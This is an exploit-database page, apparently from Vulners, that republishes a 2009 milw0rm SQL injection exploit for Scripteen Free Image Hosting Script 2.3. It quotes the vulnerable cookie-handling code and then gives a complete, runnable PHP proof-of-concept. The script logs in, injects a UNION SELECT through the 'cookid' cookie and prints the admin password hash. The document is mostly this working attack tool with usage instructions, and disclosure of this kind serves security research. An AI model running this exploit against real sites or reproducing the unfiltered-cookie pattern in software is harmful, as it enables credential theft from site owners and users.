Vulners
Lucene search
Scripteen Free Image Hosting Script 2.3 - SQL Injection
===================
Scripteen Free Image Hosting Script v2.3 SQL Injection vulnerable
===================
The vulnerable: header.php (line 53-62)
$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
$userid = $_COOKIE['cookid'];
}
if (!$usergid || empty($usergid) || $usergid==""){
$usergid = $_COOKIE['cookgid'];
}
As you can see $_COOKIE['cookid'] and $_COOKIE['cookgid'] is not filtered and can be used to do an SQL Injection
===================
Proof of concept
===================
<?php
// *************************************
// Global variables
// *************************************
$g_arguments = getArguments();
$g_url = isset($g_arguments['url']) ? $g_arguments['url'] : false;
$g_username = isset($g_arguments['username']) ? $g_arguments['username'] : false;
$g_password = isset($g_arguments['password']) ? $g_arguments['password'] : false;
// *************************************
// *************************************
// Print help
// *************************************
if(isset($g_arguments['help']) || $g_url === false || $g_username === false || $g_password === false)
{
echo "###################################\n";
echo "# \n";
echo "# Scripteen Free Image Hosting V2.3\n";
echo "# SQL Injection Exploit \n";
echo "# Discovered by Coksnuss \n";
echo "# POC script by Coksnuss \n";
echo "# \n";
echo "###################################\n";
echo "Usage: " . $argv[0] . "\n";
echo "\t--help - This help\n";
echo "\t--url=[STR] - URL of a vulnerable site (e.g. http://www.host.de/path/to/script)\n";
echo "\t--username=[STR] - A valid username to login\n";
echo "\t--password=[STR] - A valid password to login\n";
die();
}
// *************************************
// *************************************
// Main
// *************************************
$url = strpos($g_url, '.php') !== false ? dirname($g_url) : $g_url;
if(substr($url, -1, 1) == '/' ) $url = substr($url, 0, -1);
// Get Cookie
echo "Generate cookie...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $g_url . '/login.php');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_COOKIEJAR, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, 'uname=' . urlencode($g_username) . '&pass=' . urlencode($g_password));
$ret = curl_exec($curl);
curl_close($curl);
preg_match_all('/([\d]{1}[.][\d]{1})/', $ret, $matches);
if(!array_search('2.3', $matches[1]))
echo("\nWarning: It seems like this site do not use version 2.3 of the Scripteen Free Image Hosting Script!\n");
if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt'))
die('Be sure that you\'ve enabled CURL and have write permission in the script directory!');
echo "DONE\n";
// Get userid
echo "Get userid...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIEFILE, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$ret = curl_exec($curl);
curl_close($curl);
if(!preg_match('/<input type="hidden" name="userid" id="userid" value="([\d]{1,3})"/', $ret, $match))
die('Couldn\'t retrieve userid! Check your login data again!');
$userid = $match[1];
echo "DONE (" . $userid . ")\n";
// Get the password hash from userid 1
echo "Get the passwordhash from userid 1...\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIE, 'cookid=' . $userid . ' UNION SELECT 1,2,password,4,5,6,7,8,9,10,11 FROM users WHERE userid=1; cookgid=3; cookname=' . urlencode($g_username) . '; cookpass=' . md5($g_password));
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$ret = curl_exec($curl);
curl_close($curl);
if(!preg_match('/<input type="text" name="uname" id="uname" value="([a-z0-9]{32})"/', $ret, $match))
die('Couldn\'t find the password hash!');
echo "Hash found: " . $match[1] . "\n";
// *************************************
// *************************************
// Global functions
// *************************************
function getArguments()
{
global $argv;
foreach($argv as $arg)
{
if(substr($arg, 0, 2) == '--')
{
// In case its an arguments (e.g. --arg='1')
if(($pos = strpos($arg, '=')) !== false)
{
$name = substr($arg, 2, ($pos - 2));
$value = substr($arg, ($pos + 1));
$args[$name] = $value;
// Or just a flag (e.g. --help)
} else {
$name = substr($arg, 2);
$args[$name] = true;
}
} else if($arg == $argv[0]) {
$args[0] = $argv[0];
}
}
return $args;
}
// *************************************
?>
# milw0rm.com [2009-07-24]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2009 00:00Current
7.4High risk
Vulners AI Score7.4